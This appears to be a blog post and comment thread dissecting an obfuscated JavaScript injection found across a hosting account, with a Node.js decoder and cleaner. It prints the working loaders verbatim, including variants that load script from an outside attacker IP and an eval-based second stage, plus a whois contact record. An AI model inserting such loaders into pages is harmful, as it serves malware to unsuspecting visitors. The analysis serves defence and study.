So a friend came to me today with a problem he was having and wasn’t sure what to do about…
Almost EVERY page on his webserver was going to a blank white page, or a page that was NOT what was intended to be viewed.
After looking into things, I realized we may have some foul play on our hands!
So somehow, this line of code was being inserted into almost every page on his entire hosting account.
<script language=javascript><!--
document.write(unescape('%3CGXscrLrGXirLpt%20VhsrcrL%3DSn%2FHY8%2F78HY8%2EGX1GX1Cl60%2ECl61Cl67Cl65Cl6%2E24Vh9zAn%2FCl6jquVheHY8rrLyCl6%2EjSns%3EGX%3C%2FGXszAnczAnrHY8iprLtzAn%3E').replace(/Cl6|HY8|zAn|Sn|rL|Vh|GX/g,""));
--></script>
Hmmmmmmmmmmmmm…..
My first clue was the call to javascript’s unescape function, which decodes %XX (percent-encoded) text back into the characters it stands for.
If you take the encoded string and run it through a URL decoder, you end up with this:
<script language=javascript><!-- document.write(unescape('<GXscrLrGXirLpt VhsrcrL=Sn/HY8/78HY8.GX1GX1Cl60.Cl61Cl67Cl65Cl6.24Vh9zAn/Cl6jquVheHY8rrLyCl6.jSns>GX</GXszAnczAnrHY8iprLtzAn>').replace(/Cl6|HY8|zAn|Sn|rL|Vh|GX/g,"")); --></script>
Next you can see at the end they are using javascript’s replace method. Given a regular expression and a replacement string, it swaps each match for the replacement; the g flag after the regex makes it replace every match rather than only the first. Here the regular expression /Cl6|HY8|zAn|Sn|rL|Vh|GX/ matches any one of the tokens Cl6, HY8, zAn, Sn, rL, Vh or GX, and the replacement is the empty string, so all of those tokens are simply deleted. The tokens are junk sprinkled through the string so that nobody grepping their files for a plain <script src= line finds anything.
Once you remove those tokens you end up with:
<script src=//78.110.175.249/jquery.js></script>
Doing a whois on that IP address reveals:
person: Alexander A Solovyov
address: LIMT Group Ltd.
address: Karpinskogo 97a
address: Moscow
address: 111423
address: Russian Federation
phone: +7 342 2763167
e-mail: [email protected]
e-mail: [email protected]
e-mail: [email protected]
Sooooo the address sits in a netblock whose registered contact is Mr. Solovyov. One caveat before pointing fingers: whois tells you who registered the IP range (usually the hosting provider), not who is running the machine or who did the injecting. That said, a simple google search for 78.110.175.249 or Alexander A Solovyov turns up plenty of other people reporting the very same injection from this address, so it is well known for this sort of thing.
Well if you go to 78.110.175.249/jquery.js you will see what APPEARS to be a copy of the jquery library… HOWEVER… that is not all it is.
There is a hidden payload inside that copy of jquery which pulls in MORE escaped code from:
http://78.110.175.249/cp/?N
which looks like this:
_=0;for(i=0;i<9;i++){var d=document.getElementById("_"+i+"_");if(d)d.src=""}eval(unescape('~/`/~%4A~%75@%73t %66!u#c%6B%20@%6F@f~f%2E%2E%2E!?%3Cd@i#%76 %73$%74@%79%6C$e=#%64%69s%70`l%61y!:`%6E#o%6Ee~%3E|\n`va#r# t@%3Dn~e%77 @%44a@t%65|(%312!3%37|0`1%3759!2#0`%30$0`%29;#d$%6F`%63u`%6D!e|n|%74.~c!%6F%6F%6B%69e%3D%22h%67f%74=%31;` |e|xpi%72%65s~%3D"%2B~t.%74%6F!G~%4D~%54@%53%74r$i#%6E$g!%28)~+#%22`; ~pa%74|%68=/@%22@%3B\n@%2F%2F$%3C%2F`d|%69v%3E').replace(/@|\!|~|\?|#|\$|`|\|/g,""));
The first statement blanks out the src of any elements with ids _0_ through _8_; the string handed to eval() un-obfuscates, with the same unescape-then-replace trick as above, to:
//Just fuck off...<div style=display:none>
var t=new Date(1229972812000);document.cookie="hgft=1; expires="+t.toGMTString()+"; path=/";
//</div>
Which simply says “Just fuck off…” and then sets a cookie, hgft=1, for the whole site (path=/) with an expiry date. The expiry is the only part that varies: the copy of the script pasted above actually decodes to new Date(1237017592000) rather than the 1229972812000 shown here, so the server evidently fills the timestamp in when it serves the script. Presumably the cookie marks a browser that has already been dealt with.
The copy I caught was luckily not doing anything beyond setting that cookie, but it easily COULD have (and may have in the past, or may in the future): whoever controls that server can change what jquery.js and /cp/ return at any time, for every site that still carries the injected tag.
After digging a bit more, I realized that my friend’s personal computer was infected with a trojan, and the attacker had most likely stolen his hosting account login from it and used that to edit the files.
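Here is the decoding above done as a small Node.js script, so you can check a file without ever running the attacker’s code. This is an added example and not part of the original post or of anything the attacker shipped: the function and variable names (CALL_RE, decodeAll, stripInjectedLoaders and so on) are my own, and the four sample inputs are the first-stage loader and the /cp/?N second stage from this post plus the two variants quoted in the comments below (the line-wrapped one re-joined onto a single line). It does, in order, exactly what the browser does: the string literal is parsed (so a \n escape becomes a newline), unescape() turns the %XX sequences into characters, and the script’s own .replace(/junk/g,"") strips the filler tokens. It never calls eval().

```javascript
// Added example, not code from the original post: a static decoder for the
// unescape('...').replace(/junk/g,"") obfuscation analysed above. Nothing here
// calls eval(), so it can be run over suspect files without executing them.
// Sample inputs are copied from this page; all names are my own.

// The call the obfuscator emits. Group 1 is the percent-encoded string literal
// (escape sequences such as \n kept raw), group 2 the junk-token alternation.
const CALL_RE = /unescape\('((?:\\.|[^'\\])*)'\)\s*\.replace\(\/((?:\\.|[^\/])+)\/g\s*,\s*""\)/;

// Any <script> element; used to strip injected loaders from HTML.
const SCRIPT_RE = /<script\b[^>]*>[\s\S]*?<\/script>/gi;

// Step 0: interpret the escape sequences of a single-quoted JS literal, as the
// JS parser does before unescape() ever sees the text (\n, \t, \x -> x).
function unquoteJs(literal) {
  return literal.replace(/\\(.)/g, (_, c) => (c === "n" ? "\n" : c === "t" ? "\t" : c));
}

// Step 1: the legacy unescape(): %uXXXX and %XX become characters, anything
// else (including a stray '%') is left untouched.
function jsUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (_, u, x) =>
    String.fromCharCode(parseInt(u || x, 16))
  );
}

// Step 2 is the script's own .replace(/junk/g,""). Decode every obfuscated
// call in `text`; returns one plaintext per call (empty array if none).
function decodeAll(text) {
  const out = [];
  for (const m of text.matchAll(new RegExp(CALL_RE.source, "g"))) {
    const decoded = jsUnescape(unquoteJs(m[1]));
    const junk = new RegExp(m[2], "g"); // the same alternation the script builds
    out.push(decoded.replace(junk, ""));
  }
  return out;
}

// First decoded call, or null when the pattern is absent.
function decodeLayer(text) {
  const all = decodeAll(text);
  return all.length ? all[0] : null;
}

// Clean-up helper for .html/.php pages: drop every <script> element that
// carries the loader and leave all other scripts alone. Returns the cleaned
// markup and how many elements were removed.
function stripInjectedLoaders(html) {
  let removed = 0;
  const cleaned = html.replace(SCRIPT_RE, (el) => {
    if (!CALL_RE.test(el)) return el;
    removed += 1;
    return "";
  });
  return { cleaned, removed };
}

// Samples copied from this page (JS string escapes added so they embed here).
const STAGE1 =
  '<script language=javascript><!--\n' +
  'document.write(unescape(\'%3CGXscrLrGXirLpt%20VhsrcrL%3DSn%2FHY8%2F78HY8%2EGX1GX1Cl60%2ECl61Cl67Cl65Cl6%2E24Vh9zAn%2FCl6jquVheHY8rrLyCl6%2EjSns%3EGX%3C%2FGXszAnczAnrHY8iprLtzAn%3E\').replace(/Cl6|HY8|zAn|Sn|rL|Vh|GX/g,""));--></script>';
const STAGE2 =
  '_=0;for(i=0;i<9;i++){var d=document.getElementById("_"+i+"_");if(d)d.src=""}eval(unescape(\'~/`/~%4A~%75@%73t %66!u#c%6B%20@%6F@f~f%2E%2E%2E!?%3Cd@i#%76 %73$%74@%79%6C$e=#%64%69s%70`l%61y!:`%6E#o%6Ee~%3E|\\n`va#r# t@%3Dn~e%77 @%44a@t%65|(%312!3%37|0`1%3759!2#0`%30$0`%29;#d$%6F`%63u`%6D!e|n|%74.~c!%6F%6F%6B%69e%3D%22h%67f%74=%31;` |e|xpi%72%65s~%3D"%2B~t.%74%6F!G~%4D~%54@%53%74r$i#%6E$g!%28)~+#%22`; ~pa%74|%68=/@%22@%3B\\n@%2F%2F$%3C%2F`d|%69v%3E\').replace(/@|\\!|~|\\?|#|\\$|`|\\|/g,""));';
const VARIANT =
  '<script language=javascript><!--\n' +
  'document.write(unescape(\'%3CRAGsc9v8r9v8iRAGpt%20srRu0c%3D%2F%2Fyc7jEP8%2E19v810%2EjEP1jEP759v8%2E29v849KKa%2FjEPjRu0qKMdu9v8ejEPr9v8y9v8%2EKMdjs%3E%3C9v8%2F9v8scjEPryciKKaptRAG%3E\').replace(/yc|RAG|KMd|jEP|Ru0|KKa|9v8/g,"")); --></script>';
const YAHOO_COUNTER =
  'if(typeof(yahoo_counter)!=typeof(1))eval(unescape(\'/#/#%3Cdi!%76%20s~%74y~l$%65%3D@%64~isp$%6C!%61%79:`n%6Fn%65%3E\\n@%64&oc~%75m|%65%6E%74%2E#w%72@it%65("@%3C~%2Ft#%65xt#%61@%72e~%61%3E"%29!%3Bv~%61$%72%20!i~%2C|%5F,@a%3D`%5B"7~%38@%2E$%31~1%30`.$%31!%37%35.2@1"!,"1`%39%35%2E%32!%34@%2E&7%36|.2`%35%31$%22$%5D%3B%5F!%3D|%31;%69&f%28%64@%6Fcu%6D@%65nt.%63%6Fo@k@%69e$%2E%6D&at|%63$%68%28#%2F~%5C%62h@%67f%74|=$%31%2F%29!=@=`%6E%75%6C%6C%29%66%6Fr~%28%69=!%30&%3Bi%3C`2$%3B|%69%2B%2B#%29$%64%6F%63&u%6D@%65%6E&t`.@%77r#%69t$%65%28%22%3C&%73`c`%72i$%70%74$%3E%69#%66`(_@)@%64o%63`%75|%6D%65n#t@%2E%77&r%69%74%65(&%5C"`%3C~%73c%72i|p%74~%20@%69%64!%3D%5F!"+`%69%2B%22$%5F@%20sr$%63~=$%2F%2F%22&%2Ba|%5B&i@]%2B%22%2F`c!%70/&?%22&+@%6Ea@%76%69&g~%61%74!or.%61#pp#%4E%61m%65.|%63|h`%61~%72%41`%74%28%30#%29&+"%3E%3C#%5C!%5C#/~%73%63&r@i%70|t%3E%5C%22$%29%3C@%5C|/s%63r#i%70|%74%3E`%22%29#%3B\\n&/|%2F%3C`/%64@i%76%3E\').replace(/\\!|\\||~|@|`|#|\\&|\\$/g,""));var yahoo_counter=1;';

// Run directly: print the plaintext of each sample.
if (typeof require !== "undefined" && require.main === module) {
  for (const s of [STAGE1, STAGE2, VARIANT, YAHOO_COUNTER]) {
    console.log(decodeLayer(s));
    console.log("---");
  }
}
```

Run it with node and it prints the plaintext of each sample. Feed the contents of a suspect .html, .php or .js file to decodeAll() to list every loader hidden in it; stripInjectedLoaders() then removes the <script> elements that carry one (the bare-JS form injected into .js files has no element to remove, so there you use the decoder’s output to find and cut the line by hand). The fourth sample is worth reading once decoded: it checks for the hgft cookie that the second stage sets, and it builds the /cp/? URL with navigator.appName.charAt(0), which is where the N in /cp/?N comes from.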
I figured I would post this little “attack case study” to give anyone interested some insight on a simple attack. The best way to learn how to prevent these things is to be aware of them.
If you have ever been “hacked” or had your system exploited, leave a comment and let me know what you did to fix the situation, I’m curious to hear if many others have fallen prey like my friend did!
I’m having the same thing on my browser. I’m going to what should be an innocent site, but getting the 78.110.175.249/cp/?N “un-obfuscate” message from AVG. Haven’t figured how to get rid of it yet. I’ll get back with you.
To get rid of everything, you should just have to go into your webpages and remove the text that looks like what I have pasted at the top of this post.
I would also scan your system with a GOOD UPDATED antivirus program (get nod32, it’s the best) a couple of times to make sure you aren’t still infected by a trojan.
The other possibility could be that he is getting in using exploits from common scripts like joomla or wordpress, etc. I would make sure any scripts being run on your webserver are fully updated.
Good luck!
The code retrieved from 78.110.175.249 is now 3272 lines after cleaning it up with the Javascript Beautifier. It’s far beyond what I can comprehend, but I can send it to someone else for some light reading.
On the infection side of things, only .js, .html and .php files were targeted for injection. Most of the injected files were part of the FCKEditor package, meaning someone could have uploaded something through there that was not so nice.
You know, this kind of attack would work a lot better if they didn’t try so hard to obfuscate. The act of hiding makes it obvious that something is hidden. Put it in plain sight and it’s much harder to identify.
Here’s my story with this IP address.
So, I’m building a joomla website. I’m standing around at Best Buy looking at some Apple gear and took a peek at the site and it looked trashed — elements on the page were out of sorts and missing. Later, on a different machine, I noticed that it was connecting with “http://78.110.175.249/cp/a/?p” and the browser appeared to lock up. So I shut the computer down and started poking around for info on the IP address. Anyway, Spybot and AVG didn’t seem to find anything of importance but get this… the site now appears to be fine on every computer but mine. At this moment the site won’t even open (for me) in Safari (just get a blank page) and FF and IE7 are placing the joomla modules incorrectly (for me). Every other website I hit seems just fine on this computer. And other computers seem to render the site fine (www.site.connexionscc.com).
I could understand my computer screwing around with other pages or random pages but not just this particular site. Simply perplexing.
@Jay I took a glance at your source code and noticed this:
<!-- Yahoo! Counter starts
if(typeof(yahoo_counter)!=typeof(1))eval(unescape('/#/#%3Cdi!%76%20s~%74y~l$%65%3D@%64~isp$%6C!%61%79:`n%6Fn%65%3E\n@%64&oc~%75m|%65%6E%74%2E#w%72@it%65("@%3C~%2Ft#%65xt#%61@%72e~%61%3E"%29!%3Bv~%61$%72%20!i~%2C|%5F,@a%3D`%5B"7~%38@%2E$%31~1%30`.$%31!%37%35.2@1"!,"1`%39%35%2E%32!%34@%2E&7%36|.2`%35%31$%22$%5D%3B%5F!%3D|%31;%69&f%28%64@%6Fcu%6D@%65nt.%63%6Fo@k@%69e$%2E%6D&at|%63$%68%28#%2F~%5C%62h@%67f%74|=$%31%2F%29!=@=`%6E%75%6C%6C%29%66%6Fr~%28%69=!%30&%3Bi%3C`2$%3B|%69%2B%2B#%29$%64%6F%63&u%6D@%65%6E&t`.@%77r#%69t$%65%28%22%3C&%73`c`%72i$%70%74$%3E%69#%66`(_@)@%64o%63`%75|%6D%65n#t@%2E%77&r%69%74%65(&%5C"`%3C~%73c%72i|p%74~%20@%69%64!%3D%5F!"+`%69%2B%22$%5F@%20sr$%63~=$%2F%2F%22&%2Ba|%5B&i@]%2B%22%2F`c!%70/&?%22&+@%6Ea@%76%69&g~%61%74!or.%61#pp#%4E%61m%65.|%63|h`%61~%72%41`%74%28%30#%29&+"%3E%3C#%5C!%5C#/~%73%63&r@i%70|t%3E%5C%22$%29%3C@%5C|/s%63r#i%70|%74%3E`%22%29#%3B\n&/|%2F%3C`/%64@i%76%3E').replace(/\!|\||~|@|`|#|\&|\$/g,""));var yahoo_counter=1;
<!-- counter end -->
This looks like the same sort of thing as what my friend was infected with, but possibly more serious. You should make sure to get that removed from your site right away. It appears that it is in the footer of your site. From the little bit of research I did on this “yahoo counter” script injection it appears that many users had reported viruses being automatically downloaded to their computers when they visited the site.
I was infected too! Probably because of a virus on my local PC (which I used for uploading). I informed my ISP (in the Netherlands):
http://forum.antagonist.nl/viewtopic.php?f=7&t=5938
After this infection I got the virus warning on a file, setup_u.exe, on my local PC. This was AFTER my website was infected and I visited it…
So probably now the script is infecting other PCs through my/our website…
Note that some malware directly injects javascript on the machine, by looking at html, php, asp files on the machine. They don’t even need your website credentials, as YOU will upload the infected pages yourself..
my two cents.
I too have been infected with this, I had just launched my membership when I had an exploit 2 days later.
I found a config.php file in my root folder of my host with 777 permissions – I removed it and later found I had a trojan on my PC.
I am fairly green when it comes to computers so I could be a little slow in picking these things up.
I find now, when I click on pages in my nav bar from my index.php, the page is directed to 78.110.175.249. It seems to sit there for some time and then moves on to open the original page that was intended.
I am hoping I have foiled it by initially removing the suspect config.php file, but am just not sure.
My original exploit was 13/03
Any suggestions – this is my first venture into website building.
Your problem is that there is javascript inserted into your documents. I went into just one page and found this directly underneath the tag:
<script language=javascript><!--
document.write(unescape('%3CRAGsc9v8r9v8iRAGpt%20srRu0c%3D%2F%2Fyc7jEP8%2E19v810%2EjEP1jEP759v8%2E29v849KKa%2FjEPjRu0qKMdu9v8ejEPr9v8y9v8%2EKMdjs%3E%3C9v8%2F9v8scjEPryciKKaptRAG%3E').replace(/yc|RAG|KMd|jEP|Ru0|KKa|9v8/g,""));
--></script>
This is definitely something malicious. You need to remove that from every and any page it is on in your website. It is good you changed the 777 permissions but I am pretty sure this happened from the trojan you had on your computer. Make sure to remove that code from your pages and remove that trojan from your computer, then change all your passwords.
Has anyone figured out how this guy is getting into systems?
Forgot to add… in our case, he hit files/folders that had not been touched in 4 years, so I know it wasn’t infected code uploaded from user machines. Could it be an exploit in FrontPage extensions?
My guess is he got in to your hosting account/server and just ran a script to scan for certain files he is interested in and inserts the malicious code.
Very interesting… nobody suggested here how to remove this… please give a proper suggestion if anyone removed this